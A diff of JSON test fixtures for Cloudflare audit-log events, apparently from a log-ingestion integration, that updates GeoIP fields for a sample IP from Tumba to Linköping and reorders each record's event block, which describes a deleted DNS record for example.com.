@@ -1157,14 +1157,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -1176,6 +1176,21 @@ "address": "89.160.20.156", "ip": "89.160.20.156" }, + "event": { + "ingested": "2021-12-14T14:41:11.389084950Z", + "original": "{\"action\":{\"result\":true,\"type\":\"rec_del\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"46256ba8-2188-432c-8f55-21cfd2caf7d6\",\"interface\":\"UI\",\"metadata\":{\"zone_name\":\"example.com\"},\"newValue\":\"null\",\"oldValue\":\"null\",\"oldValueJson\":{\"content\":\"firebase=frc-scout\",\"id\":\"920a5b813ec88edce032f0303684ec4b\",\"name\":\"example.com\",\"proxied\":false,\"ttl\":1,\"type\":\"TXT\",\"zone_id\":\"u3fp685o1wjk5zq6hxa6a53oh49u3ek2\",\"zone_name\":\"example.com\"},\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"10715065315\",\"type\":\"DNS_record\"},\"when\":\"2021-08-09T10:20:00.289876Z\"}", + "provider": "UI", + "kind": "event", + "action": "rec_del", + "id": "46256ba8-2188-432c-8f55-21cfd2caf7d6", + "type": [ + "deletion" + ], + "category": [ + "configuration" + ], + "outcome": "success" + }, "cloudflare": { "audit": { "actor": { 
@@ -1203,21 +1218,6 @@ } } }, - "event": { - "ingested": "2021-12-13T14:40:20.776147667Z", - "original": "{\"action\":{\"result\":true,\"type\":\"rec_del\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"46256ba8-2188-432c-8f55-21cfd2caf7d6\",\"interface\":\"UI\",\"metadata\":{\"zone_name\":\"example.com\"},\"newValue\":\"null\",\"oldValue\":\"null\",\"oldValueJson\":{\"content\":\"firebase=frc-scout\",\"id\":\"920a5b813ec88edce032f0303684ec4b\",\"name\":\"example.com\",\"proxied\":false,\"ttl\":1,\"type\":\"TXT\",\"zone_id\":\"u3fp685o1wjk5zq6hxa6a53oh49u3ek2\",\"zone_name\":\"example.com\"},\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"10715065315\",\"type\":\"DNS_record\"},\"when\":\"2021-08-09T10:20:00.289876Z\"}", - "provider": "UI", - "kind": "event", - "action": "rec_del", - "id": "46256ba8-2188-432c-8f55-21cfd2caf7d6", - "type": [ - "deletion" - ], - "category": [ - "configuration" - ], - "outcome": "success" - }, "user": { "email": "user@example.com", "id": "enl3j9du8rnx2swwd9l32qots7l54t9s" @@ -1245,14 +1245,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { 
@@ -1264,6 +1264,21 @@ "address": "89.160.20.156", "ip": "89.160.20.156" }, + "event": { + "ingested": "2021-12-14T14:41:11.389085443Z", + "original": "{\"action\":{\"result\":true,\"type\":\"rec_del\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"67a29a10-e567-4123-8453-65ddcc95a411\",\"interface\":\"UI\",\"metadata\":{\"zone_name\":\"example.com\"},\"newValue\":\"null\",\"oldValue\":\"null\",\"oldValueJson\":{\"content\":\"v=spf1 include:_spf.firebasemail.com ~all\",\"id\":\"5235557990af5ef6c7e5efa6a55cbb6a\",\"name\":\"example.com\",\"proxied\":false,\"ttl\":1,\"type\":\"TXT\",\"zone_id\":\"u3fp685o1wjk5zq6hxa6a53oh49u3ek2\",\"zone_name\":\"example.com\"},\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"10715065318\",\"type\":\"DNS_record\"},\"when\":\"2021-08-09T10:19:58.237877Z\"}", + "provider": "UI", + "kind": "event", + "action": "rec_del", + "id": "67a29a10-e567-4123-8453-65ddcc95a411", + "type": [ + "deletion" + ], + "category": [ + "configuration" + ], + "outcome": "success" + }, "cloudflare": { "audit": { "actor": { 
@@ -1291,21 +1306,6 @@ } } }, - "event": { - "ingested": "2021-12-13T14:40:20.776150386Z", - "original": "{\"action\":{\"result\":true,\"type\":\"rec_del\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"67a29a10-e567-4123-8453-65ddcc95a411\",\"interface\":\"UI\",\"metadata\":{\"zone_name\":\"example.com\"},\"newValue\":\"null\",\"oldValue\":\"null\",\"oldValueJson\":{\"content\":\"v=spf1 include:_spf.firebasemail.com ~all\",\"id\":\"5235557990af5ef6c7e5efa6a55cbb6a\",\"name\":\"example.com\",\"proxied\":false,\"ttl\":1,\"type\":\"TXT\",\"zone_id\":\"u3fp685o1wjk5zq6hxa6a53oh49u3ek2\",\"zone_name\":\"example.com\"},\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"10715065318\",\"type\":\"DNS_record\"},\"when\":\"2021-08-09T10:19:58.237877Z\"}", - "provider": "UI", - "kind": "event", - "action": "rec_del", - "id": "67a29a10-e567-4123-8453-65ddcc95a411", - "type": [ - "deletion" - ], - "category": [ - "configuration" - ], - "outcome": "success" - }, "user": { "email": "user@example.com", "id": "enl3j9du8rnx2swwd9l32qots7l54t9s" @@ -1333,14 +1333,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { 
@@ -1352,6 +1352,21 @@ "address": "89.160.20.156", "ip": "89.160.20.156" }, + "event": { + "ingested": "2021-12-14T14:41:11.389085827Z", + "original": "{\"action\":{\"result\":true,\"type\":\"rec_del\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"c61e6039-6c53-42e8-8f30-24812d5d83dc\",\"interface\":\"UI\",\"metadata\":{\"zone_name\":\"example.com\"},\"newValue\":\"\",\"oldValue\":\"\",\"oldValueJson\":{\"content\":\"xClZppVPmuzSwaAIv-asdfasdfasdfa\",\"id\":\"6d1f29371601a520a621880746bfc754\",\"name\":\"_acme-challenge.example.com\",\"proxied\":false,\"ttl\":1,\"type\":\"TXT\",\"zone_id\":\"u3fp685o1wjk5zq6hxa6a53oh49u3ek2\",\"zone_name\":\"example.com\"},\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"10715065321\",\"type\":\"DNS_record\"},\"when\":\"2021-08-09T10:19:55.959347Z\"}", + "provider": "UI", + "kind": "event", + "action": "rec_del", + "id": "c61e6039-6c53-42e8-8f30-24812d5d83dc", + "type": [ + "deletion" + ], + "category": [ + "configuration" + ], + "outcome": "success" + }, "cloudflare": { "audit": { "actor": { 
@@ -1379,21 +1394,6 @@ } } }, - "event": { - "ingested": "2021-12-13T14:40:20.776152963Z", - "original": "{\"action\":{\"result\":true,\"type\":\"rec_del\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"c61e6039-6c53-42e8-8f30-24812d5d83dc\",\"interface\":\"UI\",\"metadata\":{\"zone_name\":\"example.com\"},\"newValue\":\"\",\"oldValue\":\"\",\"oldValueJson\":{\"content\":\"xClZppVPmuzSwaAIv-asdfasdfasdfa\",\"id\":\"6d1f29371601a520a621880746bfc754\",\"name\":\"_acme-challenge.example.com\",\"proxied\":false,\"ttl\":1,\"type\":\"TXT\",\"zone_id\":\"u3fp685o1wjk5zq6hxa6a53oh49u3ek2\",\"zone_name\":\"example.com\"},\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"10715065321\",\"type\":\"DNS_record\"},\"when\":\"2021-08-09T10:19:55.959347Z\"}", - "provider": "UI", - "kind": "event", - "action": "rec_del", - "id": "c61e6039-6c53-42e8-8f30-24812d5d83dc", - "type": [ - "deletion" - ], - "category": [ - "configuration" - ], - "outcome": "success" - }, "user": { "email": "user@example.com", "id": "enl3j9du8rnx2swwd9l32qots7l54t9s" @@ -1421,14 +1421,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { 
@@ -1440,6 +1440,21 @@ "address": "89.160.20.156", "ip": "89.160.20.156" }, + "event": { + "ingested": "2021-12-14T14:41:11.389086191Z", + "original": "{\"action\":{\"result\":true,\"type\":\"rec_del\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"db70fb89-0070-4591-8dbd-1b4277a056fc\",\"interface\":\"UI\",\"metadata\":{\"zone_name\":\"example.com\"},\"newValue\":\"\",\"oldValue\":\"\",\"oldValueJson\":{\"content\":\"gmr-smtp-in.l.google.com\",\"id\":\"0032abba95117ec00ea9e80443ec4328\",\"name\":\"example.com\",\"priority\":5,\"proxied\":false,\"ttl\":1,\"type\":\"MX\",\"zone_id\":\"u3fp685o1wjk5zq6hxa6a53oh49u3ek2\",\"zone_name\":\"example.com\"},\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"10715065324\",\"type\":\"DNS_record\"},\"when\":\"2021-08-09T10:19:53.671977Z\"}", + "provider": "UI", + "kind": "event", + "action": "rec_del", + "id": "db70fb89-0070-4591-8dbd-1b4277a056fc", + "type": [ + "deletion" + ], + "category": [ + "configuration" + ], + "outcome": "success" + }, "cloudflare": { "audit": { "actor": { 
@@ -1468,21 +1483,6 @@ } } }, - "event": { - "ingested": "2021-12-13T14:40:20.776155575Z", - "original": "{\"action\":{\"result\":true,\"type\":\"rec_del\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"db70fb89-0070-4591-8dbd-1b4277a056fc\",\"interface\":\"UI\",\"metadata\":{\"zone_name\":\"example.com\"},\"newValue\":\"\",\"oldValue\":\"\",\"oldValueJson\":{\"content\":\"gmr-smtp-in.l.google.com\",\"id\":\"0032abba95117ec00ea9e80443ec4328\",\"name\":\"example.com\",\"priority\":5,\"proxied\":false,\"ttl\":1,\"type\":\"MX\",\"zone_id\":\"u3fp685o1wjk5zq6hxa6a53oh49u3ek2\",\"zone_name\":\"example.com\"},\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"10715065324\",\"type\":\"DNS_record\"},\"when\":\"2021-08-09T10:19:53.671977Z\"}", - "provider": "UI", - "kind": "event", - "action": "rec_del", - "id": "db70fb89-0070-4591-8dbd-1b4277a056fc", - "type": [ - "deletion" - ], - "category": [ - "configuration" - ], - "outcome": "success" - }, "user": { "email": "user@example.com", "id": "enl3j9du8rnx2swwd9l32qots7l54t9s" @@ -1510,14 +1510,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { 
@@ -1529,6 +1529,21 @@ "address": "89.160.20.156", "ip": "89.160.20.156" }, + "event": { + "ingested": "2021-12-14T14:41:11.389086569Z", + "original": "{\"action\":{\"result\":true,\"type\":\"rec_del\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"d135d737-3a93-4a99-8ba3-8eaf8a149daf\",\"interface\":\"UI\",\"metadata\":{\"zone_name\":\"example.com\"},\"newValue\":\"\",\"oldValue\":\"\",\"oldValueJson\":{\"content\":\"alt1.gmr-smtp-in.l.google.com\",\"id\":\"c84049638d49a7569dcd2e29592f7f64\",\"name\":\"example.com\",\"priority\":10,\"proxied\":false,\"ttl\":1,\"type\":\"MX\",\"zone_id\":\"u3fp685o1wjk5zq6hxa6a53oh49u3ek2\",\"zone_name\":\"example.com\"},\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"10715065330\",\"type\":\"DNS_record\"},\"when\":\"2021-08-09T10:19:51.321861Z\"}", + "provider": "UI", + "kind": "event", + "action": "rec_del", + "id": "d135d737-3a93-4a99-8ba3-8eaf8a149daf", + "type": [ + "deletion" + ], + "category": [ + "configuration" + ], + "outcome": "success" + }, "cloudflare": { "audit": { "actor": { 
@@ -1557,21 +1572,6 @@ } } }, - "event": { - "ingested": "2021-12-13T14:40:20.776158237Z", - "original": "{\"action\":{\"result\":true,\"type\":\"rec_del\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"d135d737-3a93-4a99-8ba3-8eaf8a149daf\",\"interface\":\"UI\",\"metadata\":{\"zone_name\":\"example.com\"},\"newValue\":\"\",\"oldValue\":\"\",\"oldValueJson\":{\"content\":\"alt1.gmr-smtp-in.l.google.com\",\"id\":\"c84049638d49a7569dcd2e29592f7f64\",\"name\":\"example.com\",\"priority\":10,\"proxied\":false,\"ttl\":1,\"type\":\"MX\",\"zone_id\":\"u3fp685o1wjk5zq6hxa6a53oh49u3ek2\",\"zone_name\":\"example.com\"},\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"10715065330\",\"type\":\"DNS_record\"},\"when\":\"2021-08-09T10:19:51.321861Z\"}", - "provider": "UI", - "kind": "event", - "action": "rec_del", - "id": "d135d737-3a93-4a99-8ba3-8eaf8a149daf", - "type": [ - "deletion" - ], - "category": [ - "configuration" - ], - "outcome": "success" - }, "user": { "email": "user@example.com", "id": "enl3j9du8rnx2swwd9l32qots7l54t9s" @@ -1599,14 +1599,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { 
@@ -1618,14 +1618,29 @@ "address": "89.160.20.156", "ip": "89.160.20.156" }, - "cloudflare": { - "audit": { - "actor": { - "type": "user" - }, - "owner": { - "id": "eojhfbg334i88zs2pr2rd7wr82jf2h95" - }, + "event": { + "ingested": "2021-12-14T14:41:11.389086939Z", + "original": "{\"action\":{\"result\":true,\"type\":\"rec_del\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"c6eca550-2e5b-43da-8125-4857d928899e\",\"interface\":\"UI\",\"metadata\":{\"zone_name\":\"example.com\"},\"newValue\":\"\",\"oldValue\":\"\",\"oldValueJson\":{\"content\":\"alt2.gmr-smtp-in.l.google.com\",\"id\":\"f83d5eb5f7f93c67d57e008d848ee3d1\",\"name\":\"example.com\",\"priority\":20,\"proxied\":false,\"ttl\":1,\"type\":\"MX\",\"zone_id\":\"u3fp685o1wjk5zq6hxa6a53oh49u3ek2\",\"zone_name\":\"example.com\"},\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"10715065333\",\"type\":\"DNS_record\"},\"when\":\"2021-08-09T10:19:48.87573Z\"}", + "provider": "UI", + "kind": "event", + "action": "rec_del", + "id": "c6eca550-2e5b-43da-8125-4857d928899e", + "type": [ + "deletion" + ], + "category": [ + "configuration" + ], + "outcome": "success" + }, + "cloudflare": { + "audit": { + "actor": { + "type": "user" + }, + "owner": { + "id": "eojhfbg334i88zs2pr2rd7wr82jf2h95" + }, "metadata": { "zone_name": "example.com" }, 
@@ -1646,21 +1661,6 @@ } } }, - "event": { - "ingested": "2021-12-13T14:40:20.776160838Z", - "original": "{\"action\":{\"result\":true,\"type\":\"rec_del\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"c6eca550-2e5b-43da-8125-4857d928899e\",\"interface\":\"UI\",\"metadata\":{\"zone_name\":\"example.com\"},\"newValue\":\"\",\"oldValue\":\"\",\"oldValueJson\":{\"content\":\"alt2.gmr-smtp-in.l.google.com\",\"id\":\"f83d5eb5f7f93c67d57e008d848ee3d1\",\"name\":\"example.com\",\"priority\":20,\"proxied\":false,\"ttl\":1,\"type\":\"MX\",\"zone_id\":\"u3fp685o1wjk5zq6hxa6a53oh49u3ek2\",\"zone_name\":\"example.com\"},\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"10715065333\",\"type\":\"DNS_record\"},\"when\":\"2021-08-09T10:19:48.87573Z\"}", - "provider": "UI", - "kind": "event", - "action": "rec_del", - "id": "c6eca550-2e5b-43da-8125-4857d928899e", - "type": [ - "deletion" - ], - "category": [ - "configuration" - ], - "outcome": "success" - }, "user": { "email": "user@example.com", "id": "enl3j9du8rnx2swwd9l32qots7l54t9s" @@ -1688,14 +1688,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { 
@@ -1707,6 +1707,21 @@ "address": "89.160.20.156", "ip": "89.160.20.156" }, + "event": { + "ingested": "2021-12-14T14:41:11.389087309Z", + "original": "{\"action\":{\"result\":true,\"type\":\"rec_del\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"df20e4be-09f1-44b2-b1ee-3d44b7eca81e\",\"interface\":\"UI\",\"metadata\":{\"zone_name\":\"example.com\"},\"newValue\":\"\",\"oldValue\":\"\",\"oldValueJson\":{\"content\":\"alt3.gmr-smtp-in.l.google.com\",\"id\":\"5cf70e1b541a242428ece2af214889b2\",\"name\":\"example.com\",\"priority\":30,\"proxied\":false,\"ttl\":1,\"type\":\"MX\",\"zone_id\":\"u3fp685o1wjk5zq6hxa6a53oh49u3ek2\",\"zone_name\":\"example.com\"},\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"10715065336\",\"type\":\"DNS_record\"},\"when\":\"2021-08-09T10:19:46.609249Z\"}", + "provider": "UI", + "kind": "event", + "action": "rec_del", + "id": "df20e4be-09f1-44b2-b1ee-3d44b7eca81e", + "type": [ + "deletion" + ], + "category": [ + "configuration" + ], + "outcome": "success" + }, "cloudflare": { "audit": { "actor": { 
@@ -1735,21 +1750,6 @@ } } }, - "event": { - "ingested": "2021-12-13T14:40:20.776163448Z", - "original": "{\"action\":{\"result\":true,\"type\":\"rec_del\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"df20e4be-09f1-44b2-b1ee-3d44b7eca81e\",\"interface\":\"UI\",\"metadata\":{\"zone_name\":\"example.com\"},\"newValue\":\"\",\"oldValue\":\"\",\"oldValueJson\":{\"content\":\"alt3.gmr-smtp-in.l.google.com\",\"id\":\"5cf70e1b541a242428ece2af214889b2\",\"name\":\"example.com\",\"priority\":30,\"proxied\":false,\"ttl\":1,\"type\":\"MX\",\"zone_id\":\"u3fp685o1wjk5zq6hxa6a53oh49u3ek2\",\"zone_name\":\"example.com\"},\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"10715065336\",\"type\":\"DNS_record\"},\"when\":\"2021-08-09T10:19:46.609249Z\"}", - "provider": "UI", - "kind": "event", - "action": "rec_del", - "id": "df20e4be-09f1-44b2-b1ee-3d44b7eca81e", - "type": [ - "deletion" - ], - "category": [ - "configuration" - ], - "outcome": "success" - }, "user": { "email": "user@example.com", "id": "enl3j9du8rnx2swwd9l32qots7l54t9s" @@ -1777,14 +1777,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { 
@@ -1796,6 +1796,21 @@ "address": "89.160.20.156", "ip": "89.160.20.156" }, + "event": { + "ingested": "2021-12-14T14:41:11.389087679Z", + "original": "{\"action\":{\"result\":true,\"type\":\"rec_del\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"ab8dd3c6-fecd-4360-a3e2-6177520a428b\",\"interface\":\"UI\",\"metadata\":{\"zone_name\":\"example.com\"},\"newValue\":\"\",\"oldValue\":\"\",\"oldValueJson\":{\"content\":\"alt4.gmr-smtp-in.l.google.com\",\"id\":\"e80fa3d2167cfcaf172201e46c79c004\",\"name\":\"example.com\",\"priority\":40,\"proxied\":false,\"ttl\":1,\"type\":\"MX\",\"zone_id\":\"u3fp685o1wjk5zq6hxa6a53oh49u3ek2\",\"zone_name\":\"example.com\"},\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"10715065339\",\"type\":\"DNS_record\"},\"when\":\"2021-08-09T10:19:44.409826Z\"}", + "provider": "UI", + "kind": "event", + "action": "rec_del", + "id": "ab8dd3c6-fecd-4360-a3e2-6177520a428b", + "type": [ + "deletion" + ], + "category": [ + "configuration" + ], + "outcome": "success" + }, "cloudflare": { "audit": { "actor": { 
@@ -1824,21 +1839,6 @@ } } }, - "event": { - "ingested": "2021-12-13T14:40:20.776166034Z", - "original": "{\"action\":{\"result\":true,\"type\":\"rec_del\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"ab8dd3c6-fecd-4360-a3e2-6177520a428b\",\"interface\":\"UI\",\"metadata\":{\"zone_name\":\"example.com\"},\"newValue\":\"\",\"oldValue\":\"\",\"oldValueJson\":{\"content\":\"alt4.gmr-smtp-in.l.google.com\",\"id\":\"e80fa3d2167cfcaf172201e46c79c004\",\"name\":\"example.com\",\"priority\":40,\"proxied\":false,\"ttl\":1,\"type\":\"MX\",\"zone_id\":\"u3fp685o1wjk5zq6hxa6a53oh49u3ek2\",\"zone_name\":\"example.com\"},\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"10715065339\",\"type\":\"DNS_record\"},\"when\":\"2021-08-09T10:19:44.409826Z\"}", - "provider": "UI", - "kind": "event", - "action": "rec_del", - "id": "ab8dd3c6-fecd-4360-a3e2-6177520a428b", - "type": [ - "deletion" - ], - "category": [ - "configuration" - ], - "outcome": "success" - }, "user": { "email": "user@example.com", "id": "enl3j9du8rnx2swwd9l32qots7l54t9s" @@ -1866,14 +1866,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { 
@@ -1885,6 +1885,21 @@ "address": "89.160.20.156", "ip": "89.160.20.156" }, + "event": { + "ingested": "2021-12-14T14:41:11.389088154Z", + "original": "{\"action\":{\"result\":true,\"type\":\"rec_del\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"99461ef3-1cfc-4cc9-9430-6ec2fa7a597f\",\"interface\":\"UI\",\"metadata\":{\"zone_name\":\"example.com\"},\"newValue\":\"\",\"oldValue\":\"\",\"oldValueJson\":{\"content\":\"connect.domains.google.com\",\"id\":\"a56b790a1293bdb5b4aeb88e23f1679a\",\"name\":\"_domainconnect.example.com\",\"proxied\":true,\"ttl\":1,\"type\":\"CNAME\",\"zone_id\":\"u3fp685o1wjk5zq6hxa6a53oh49u3ek2\",\"zone_name\":\"example.com\"},\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"10715065345\",\"type\":\"DNS_record\"},\"when\":\"2021-08-09T10:19:41.639476Z\"}", + "provider": "UI", + "kind": "event", + "action": "rec_del", + "id": "99461ef3-1cfc-4cc9-9430-6ec2fa7a597f", + "type": [ + "deletion" + ], + "category": [ + "configuration" + ], + "outcome": "success" + }, "cloudflare": { "audit": { "actor": { 
@@ -1912,21 +1927,6 @@ } } }, - "event": { - "ingested": "2021-12-13T14:40:20.776168786Z", - "original": "{\"action\":{\"result\":true,\"type\":\"rec_del\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"99461ef3-1cfc-4cc9-9430-6ec2fa7a597f\",\"interface\":\"UI\",\"metadata\":{\"zone_name\":\"example.com\"},\"newValue\":\"\",\"oldValue\":\"\",\"oldValueJson\":{\"content\":\"connect.domains.google.com\",\"id\":\"a56b790a1293bdb5b4aeb88e23f1679a\",\"name\":\"_domainconnect.example.com\",\"proxied\":true,\"ttl\":1,\"type\":\"CNAME\",\"zone_id\":\"u3fp685o1wjk5zq6hxa6a53oh49u3ek2\",\"zone_name\":\"example.com\"},\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"10715065345\",\"type\":\"DNS_record\"},\"when\":\"2021-08-09T10:19:41.639476Z\"}", - "provider": "UI", - "kind": "event", - "action": "rec_del", - "id": "99461ef3-1cfc-4cc9-9430-6ec2fa7a597f", - "type": [ - "deletion" - ], - "category": [ - "configuration" - ], - "outcome": "success" - }, "user": { "email": "user@example.com", "id": "enl3j9du8rnx2swwd9l32qots7l54t9s" @@ -1954,14 +1954,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { 
@@ -1973,6 +1973,21 @@ "address": "89.160.20.156", "ip": "89.160.20.156" }, + "event": { + "ingested": "2021-12-14T14:41:11.389088530Z", + "original": 